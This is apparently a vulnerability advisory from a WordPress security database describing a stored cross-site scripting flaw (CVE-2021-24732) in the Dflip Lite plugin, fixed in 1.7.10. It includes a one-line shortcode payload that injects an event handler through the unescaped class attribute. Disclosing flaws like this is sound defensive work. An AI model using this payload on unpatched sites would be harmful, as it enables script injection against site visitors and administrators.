logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Dflip Lite < 1.7.10 - Contributor+ Stored Cross-Site Scripting

Description

The plugin does not escape the class attribute of its shortcode before outputting it back in an attribute, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks

Proof of Concept

[dflip class='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin)//']

Affects Plugins

3d-flipbook-dflip-lite

Fixed in version 1.7.10

References

CVE

CVE-2021-24732

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

9425a9b2-e9b8-41f5-a3ca-623b6da0297c

Timeline

Publicly Published

2021-09-15 (about 4 months ago)

Added

2021-09-15 (about 4 months ago)

Last Updated

2021-09-15 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin